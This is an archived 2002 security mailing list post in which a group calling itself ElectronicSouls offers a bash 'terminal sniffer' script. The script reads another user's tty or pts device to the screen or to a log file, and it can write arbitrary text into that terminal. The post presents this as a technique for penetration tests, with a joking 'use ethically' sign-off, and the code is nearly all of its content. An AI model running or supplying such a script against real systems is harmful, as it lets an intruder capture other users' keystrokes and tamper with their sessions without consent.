lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200211291635.gATGZBtX047887@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Term Sniffing Warez

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have discovered a new technique for monitoring a user's terminal on
a system, which you may find useful in your penetration tests.

Enjoy.

# cat ES-term-sniff.sh
#!/bin/bash
# Basic Terminal Sniffer
# (C) BrainStorm - ElectronicSouls
#
# usage: ./$0 tty 1
#    or: ./$0 pts/ 2

echo ""
echo "Basic Terminal Sniffer (C) BrainStorm - ElectronicSouls"
echo ""

echo "Options:"
echo "--------"
echo "        -1 send output to screen."
echo "        -2 log output to a file. "
echo "        -3 write to a term!      "
echo "---------------------------------"

echo -n "Choose: ";read input
if [ "$input" = "" ];
     then
     echo "bye!"
     exit
fi

if [ "$input" = "1" ];
     then
     echo "- Sniffing on $1$2 started...."
     echo "- sending output to screen.   "
     cat /dev/$1$2
fi

if [ "$input" = "2" ];
     then
     echo "- Sniffing on $1$2 started...."
     echo "- logging data to term.log "
     cat /dev/$1$2 > term.log &
fi

if [ "$input" = "3" ];
     then
     echo "- Enter data that should be sent to $1$2,"
     echo "- Note that we just write to a term, it doesnt gets executed!"
     echo ""
     echo -n "- Send: "; read data
     echo "writing - $data - to $1$2 !"
     echo $data > /dev/$1$2
fi

#

Remember to use ethically!@#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We are learning PERL too."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nl1EMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltazIAoKeiQODjFLZB
JRgKa/UgKZuL+9UDAKCfZSggtqQQYowJoz3m2ZBQ3JgpPg==
=zduV
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ